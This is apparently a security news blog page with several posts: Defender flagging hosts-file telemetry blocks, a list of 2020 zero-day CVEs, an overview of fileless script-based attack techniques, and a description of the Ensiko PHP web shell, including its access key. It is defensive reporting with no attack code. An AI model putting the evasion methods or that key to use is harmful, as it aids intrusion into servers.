The native antivirus client of the Windows 10 operating system, Microsoft Defender, has started to flag the hosts file on the system as malicious if it contains redirects for certain Microsoft servers.
The hosts file is a simple plain text designed to redirect connections. Users find it under C:\Windows\System32\drivers\etc\hosts on any system and it is easy enough to redirect requests. It has been used for ages to block known malicious sites or advertisement sites.
All you have to do is add redirects in the form of 127.0.0.1 http://www.microsoft.com to the hosts file to redirect requests to the site “www.microsoft.com” in this case to the local computer. The effect is simple: the request is blocked.
With the release of Windows 10 came an increased Telemetry server blocking usage. Privacy tools would add known Telemetry servers to the hosts file to block connections and thus the transmission of Telemetry data to Microsoft.
Microsoft Defender Antivirus flags certain hosts file changes as a threat. An attempt to add telemetry.microsoft.com and microsoft.com redirects to 127.0.0.1 to the hosts file resulted in Microsoft Defender flagging the file and restoring the original version.
Attempts to save the file may display the following notification by Microsoft Defender:
Operation did not complete successfully because the file contains a virus or potentially unwanted software.
It is possible that other servers will also be seen as a threat by Microsoft Defender. Windows 10 users may allow the threat in Microsoft Defender, at least for now, to add these redirects to the file again. The problem with the approach is that it will allow all modifications, even those by malicious software. Another option is to turn off Microsoft Defender and to start using a different security solution for Windows.
A false positive seems unlikely considering that the list of servers includes mostly Telemetry servers.
Windows 10 tools that add entries to the hosts file may be affected by this negatively. Most privacy tools that manipulate the hosts file to block Telemetry will certainly fail to add the entries to the hosts file if Microsoft Defender is the resident antivirus solution.
Google’s Project Zero security team, there have been 11 zero-day vulnerabilities exploited in the wild in the first half of the year.
2020 H1 ZERO-DAYS
1. Firefox (CVE-2019-17026)
This zero-day was used as part of a combo with another zero-day.
same has been patched
2. Internet Explorer (CVE-2020-0674)
Both of Firefox zero-day listed above and this one have been used by a nation-state hacking group known as DarkHotel, believed to be operating out of the Korean peninsula (unclear if from North Korea or South Korea). Both zero-days have been used to spy on targets located in China and Japan, hence why they were both discovered by Qihoo 360 (Chinese antivirus maker) and JPCERT (Japan’s Computer Emergency Response Team).
Victims of this campaign were redirected to a website where they’d be served either the Firefox or IE zero-day, and then they were infected with the Gh0st remote access trojan.
3. Chrome (CVE-2020-6418)
This zero-day was detected exploited in the wild by Google’s Threat Analysis Group, and details about the attacks where it was used were never released.
4. & 5. Trend Micro OfficeScan (CVE-2020-8467 and CVE-2020-8468)
Both zero-days were discovered internally by Trend Micro staff. It is believed the zero-days were discovered while Trend Micro investigated a 2019 zero-day in the same product that was used in mitshubishi hack
6. & 7. Firefox (CVE-2020-6819 and CVE-2020-6820)
Details about the attacks where these two Firefox zero-days have been used have not yet been released, although, security researchers suggested these might be part of a larger exploit chain.
8. & 9. & 10. (CVE-2020-0938, CVE-2020-1020, and CVE-2020-1027)
All three bugs have been discovered and reported to Microsoft by Google TAG, and just like most Google TAG discoveries, no details about the attacks have been released — yet.
11. Sophos XG Firewall (CVE 2020-12271)
A group of hackers discovered earlier this year a zero-day in XG, a top-shelf firewall product developed by UK security firm Sophos. The zero-day, an SQL injection in the firewall’s management panel, allowed hackers to plant the Asnarok backdoor on infected systems. In an investigation, Sophos said hackers tried to deploy the Ragnarok ransomware on infected hosts once its zero-day made the news, but the company says it blocked most attempts.
In 2019 total Zero days are 20 as a whole identified . have to wait and watch for the rest of the month to take a toll on the total tally
Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to a disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movements post-infection.
Script-based attacks
A script can be anything from a sequence of simple system commands, advanced scripting languages used for system configurations, complex task automation, and other general purposes. Common scripting languages are VBScript, JavaScript, and PowerShell. Unlike applications that run after being compiled into machine code, computers interpret scripts.
How attackers use scripts
Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.
The use of scripts poses many advantages to the attacker: scripts are easy to write and execute, trivial to obfuscate, and extremely polymorphic. Moreover, attackers can use many types of script files to carry out an attack – the most popular being PowerShell, JavaScript, HTA, VBA, VBS, and batch scripts. Since fileless attacks occur in memory, traditional static file detection is rendered useless.
Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.
Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.
PowerShell
PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.
A malicious file loader using PowerShell
Attackers use poweshell in their attacks to load malware directly in memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.
As with other types of attacks, in a script-based attack, the initial hold of the victim generally occurs through a successful phishing attack, which contains a dropper – such as a PDF, RTF, Office file, or archive. In most cases, the dropper will then run a script, either a VBA macro or another type of script, such as PowerShell, JavaScript, or HTA.
JavaScript
JavaScript is a standard scripting language used in web pages, web applications, and browsers. JavaScript can manipulate and modify PDF files with implemented objects, web page links, and more. Most PDF-based attacks use the PDF reader software or an in-browser reader to run JavaScript code on the victims’ machine.
Additional script-based threats
HTML application (HTA) is a Microsoft Windows file meant to run on Internet Explorer, which combines HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through Microsoft HTA engine (mshta.exe) that has the local user’s privileges instead of Internet Explorer’s restricted privileges, with access to the filesystem and registry.
Malicious HTA files allow scripts to run the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or redirects from malicious websites.
Scripts to run in network is that safe ?
With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.
A basic first step any organization should consider is segmenting employees into several groups:
1. Running scripts is part of their day-to-day job 2. Running scripts is not common but might happen 3. There is no need to run scripts
With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance the ability to detect script-based attacks while allowing users who need to use scripts for their job function to do so without interruption.
Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP, making it a high risk for Windows, macOS, and Linux web servers.
The malware received the name Ensiko and is a web shell written in PHP. Attackers can use it to remotely control a compromised system and run a host of malicious activities.
Ensiko’s large list of capabilities, the file-encryption component stands out as it can be used for ransomware attacks against servers.
Researchers found that it uses the symmetric Rijnadel-128 cipher in CBC mode to encrypt files.
Ensiko encrypts files in a web shell directory and subdirectories and appends the .BAK extension to processed files.
The malware can be password protected for secure access and avoid a takeover like it happened last week with Emotet when someone replaced the malware payloads with memes.
Authenticating to this web shell is not straightforward. The developer hid the login form on a “Not Found” page. For the analyzed sample, the access key is “RaBiitch.”
To expand capabilities, Ensiko can load several tools, which the malware downloads from Pastebin and stores them in a directory named “tools_ensikology.”
One of the functions of the malware is called Steganologer, which can identify image files that have code in their metadata (EXIF headers). The code is then extracted and executed on the compromised server.
Ensiko can also check if a web shell from a predefined list is present on a remote host. Another scanning function called Remote File Check allows the operator to look for arbitrary files on a remote system.
Another function in this malicious tool allows recursive overwrite of all files with a specified extension in a directory of a web shell.
Ensiko’s capabilities do not stop at this, though. The malware lets threat actors run brute-force attacks on FTP, cPanel, and Telnet, thus enabling them extended access.
